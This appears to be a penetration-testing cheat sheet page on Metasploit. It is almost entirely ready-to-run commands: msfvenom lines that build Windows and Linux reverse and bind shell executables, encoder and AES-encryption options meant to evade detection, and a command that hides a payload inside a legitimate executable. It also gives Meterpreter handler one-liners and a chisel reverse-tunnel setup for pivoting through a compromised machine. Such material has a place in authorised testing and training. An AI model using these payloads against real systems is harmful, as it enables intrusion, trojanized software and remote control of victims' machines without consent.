> For the complete documentation index, see [llms.txt](https://hacker-mind.gitbook.io/hacker-mind/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacker-mind.gitbook.io/hacker-mind/metasploit.md).

# Metasploit

## Handler C2 Meterpreter

```
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"
```

## Payload Windows

### Reverse Shell

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
```

### Bind Shell

```
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
```

## Payload Linux

### Reverse Shell

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
```

### Bind Shell

```
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
```

## Metasploit Encoder

```
msfvenom --list encoders

# x86/shikata_ga_nai
# reverse shell  x86
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e x86/shikata_ga_nai -f exe -o shell.exe

# x64
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e x64/zutto_dekiru -f exe -o shell64.exe

# patch the legit exe with payload

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e <encoder> -x <legit exe> -f exe -o shell_legit.exe

msfvenom --list encrypt

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 --encrypt aes256 --encrypt-key <the key> -f exe -o shell_aes.exe


```

## Metasploit Reverse Payload with Reverse Individual Proxy

tunnel reference:

{% embed url="<https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel>" %}

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2FBfwiBojuarXVULKOEbtc%2Fimage.png?alt=media&amp;token=1e43b33c-219e-4c0b-8226-6a37bd8d687f" alt=""><figcaption></figcaption></figure>

**Compromised Machine**

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2F0pHFErPqrfNRhXXBNOS7%2Fimage.png?alt=media&amp;token=ebfea2a1-ed91-4925-beb3-16b88ef32dbc" alt=""><figcaption></figcaption></figure>

```
./chisel server --reverse --port 8000
```

**Kali Linux**

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2FPbcWO2gjwTafMOF8F7Ec%2Fimage.png?alt=media&amp;token=9d1479ae-563f-4a92-90bb-e3ddfd6db8c3" alt=""><figcaption></figcaption></figure>

format: chisel client \<server chisel>:\<port>  R:\<linux port>:127.0.0.1:

```
chisel client 192.168.11.4:8000 R:50001:127.0.0.1:443
```

**Generate Payload:**

set LHOST to reachable port in compromised machine from target machine.

```
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.56.107 LPORT=50001 -f exe > proxy_payload.exe
```

**Handler C2 Meterpreter:**

{% hint style="info" %}
because the tunnel set directly to loopback, make sure the LHOST is also loopback (127.0.0.1)
{% endhint %}

```
sudo msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_https;set LHOST 127.0.0.1;set LPORT 443;run;"
```

reference:

<https://medium.com/@techmindxperts/complete-guide-to-metasploit-from-installation-to-exploit-development-eb89a507c07d>

<https://book.hacktricks.xyz/generic-methodologies-and-resources/reverse-shells/msfvenom>
